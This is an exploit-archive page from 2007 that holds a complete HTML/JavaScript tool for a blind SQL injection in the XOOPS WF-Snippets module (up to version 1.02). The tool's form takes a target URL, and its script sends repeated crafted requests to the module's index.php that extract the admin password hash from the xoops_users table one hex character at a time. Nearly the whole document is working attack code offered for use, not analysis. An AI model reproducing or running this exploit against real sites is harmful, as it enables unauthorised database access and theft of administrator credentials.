Home / exploits xoops-snippets-sql.txt
Posted on 05 April 2007
<html> <head> <title>XOOPS Module WF-Snippets <= 1.02 (c) BLIND SQL Injection Exploit</title> <script type="text/javascript"> //'=============================================================================================== //'[Script Name: XOOPS Module WF-Snippets <= 1.02 (c) BLIND SQL Injection Exploit //'[Coded by : ajann //'[Author : ajann //'[Contact : :( //'[S.Page : http://www.xoops.org/ //'[$$ : Free //'[Using : Write Target after Submit Click //'=============================================================================================== function nesneyarat() { var nesne; var tarayici = navigator.appName; if(tarayici == "Microsoft Internet Explorer"){ nesne = new ActiveXObject("Microsoft.XMLHTTP"); } else { nesne = new XMLHttpRequest(); } return nesne; } var http = nesneyarat(); function islemlink(adresyolla,charyolla) { genreidim=document.getElementById('genreid').value file="/modules/wfsnippets/index.php?op=cat&c=" + genreidim pathim=document.getElementById('path').value + file karakterim=document.getElementById('karakter').value + charyolla adres=document.getElementById('adresim').value + pathim + adresyolla + karakterim http.open('get', adres); http.onreadystatechange = cevapFonksiyonu; http.send(null); } function cevapFonksiyonu() { if(http.readyState == 4){ document.getElementById('mesaj').value = http.responseText; yonlendir(); } } function yonlendir() { if (document.getElementById('mesaj').value.indexOf('<tr valign="top">', 0) == -1) { alert('False'); } if (document.getElementById('mesaj').value.indexOf('<tr valign="top">', 0) != -1) { alert('TRUEEEEEEE'); } } function dal() { if (document.getElementById('buton').value == "Test Character(0)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=48)/*'); document.getElementById('buton').value = "Test Character(1)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(1)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=49)/*'); document.getElementById('buton').value = "Test Character(2)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(2)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=50)/*'); document.getElementById('buton').value = "Test Character(3)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(3)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=51)/*'); document.getElementById('buton').value = "Test Character(4)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(4)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=52)/*'); document.getElementById('buton').value = "Test Character(5)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(5)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=53)/*'); document.getElementById('buton').value = "Test Character(6)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(6)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=54)/*'); document.getElementById('buton').value = "Test Character(7)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(7)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=55)/*'); document.getElementById('buton').value = "Test Character(8)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(8)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=56)/*'); document.getElementById('buton').value = "Test Character(9)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(9)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=57)/*'); document.getElementById('buton').value = "Test Character(a)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(a)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=97)/*'); document.getElementById('buton').value = "Test Character(b)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(b)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=98)/*'); document.getElementById('buton').value = "Test Character(c)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(c)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=99)/*'); document.getElementById('buton').value = "Test Character(d)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(d)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=100)/*'); document.getElementById('buton').value = "Test Character(e)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(e)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=101)/*'); document.getElementById('buton').value = "Test Character(f)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(f)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=102)/*'); document.getElementById('buton').value = "Finished" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } } </script> </head> <body bgcolor="#000000"> <center> <p><b><font face="Verdana" size="2" color="#008000">XOOPS Module WF-Snippets <= 1.02 (c) BLIND SQL Injection Exploit</font></b></p> <p></p> <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/</font><font color="#00FF00" size="2" face="Arial"> </font><font color="#FF0000" size="2"> </font></b> <input type="text" name="adresim" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="http://"></p> <br> <b><font face="Arial" size="1" color="#FF0000"> Path:</font><font face="Arial" size="1" color="#808080">[http://[target]/[scriptpath] </font></b> <input type="text" name="path" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="/"> <p> <b><font face="Arial" size="1" color="#FF0000"> Character:</font><font face="Arial" size="1" color="#808080">[Md5 Character 1-32] </font></b> <input type="text" name="karakter" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1"> </p> <p> <b><font face="Arial" size="1" color="#FF0000">Article Id:</font><font face="Arial" size="1" color="#808080">[print.php?articleid=] </font></b> <input type="text" name="genreid" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1"> </p> <p><input type="submit" value="Test Character(0)" name="buton" onclick="dal();"></p> <br> <textarea name="mesaj" rows="1" cols="20" style="visibility:hidden"></textarea> <br> <p> <b><font face="Verdana" size="2" color="#008000">ajann</font></b></p> </p> </center> </body> </html>
